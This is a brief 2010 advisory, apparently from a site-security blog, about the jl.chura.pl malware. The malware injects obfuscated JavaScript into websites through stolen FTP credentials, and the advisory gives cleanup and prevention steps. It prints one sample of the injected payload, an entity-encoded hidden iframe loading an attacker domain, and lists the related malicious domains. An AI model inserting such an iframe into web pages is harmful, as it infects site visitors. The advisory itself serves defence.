jl.chura.pl Malware

April 12, 2010

The jl.chura.pl malware places obfuscated malicious JavaScript into a website's web pages. To clean the website, the website needs to be reverted to a clean backup or the malicious code needs to be removed from the web pages and or JavaScript files. The malware gains access to the website through FTP credentials that have been compromised by malware located on a computer that has accessed the website via FTP. To prevent the website from being reinfected the FTP password needs to be changed and the malware removed from the infected computer before it used again to again to access the website via FTP.

Recent code Format On Web Pages:

<iframe src="http://jL.ch&#117;ra.pl&#47;rc/"></iframe>

Recent Domains Used by the Malware: jl.chura.pl, trenz.pl, brenz.pl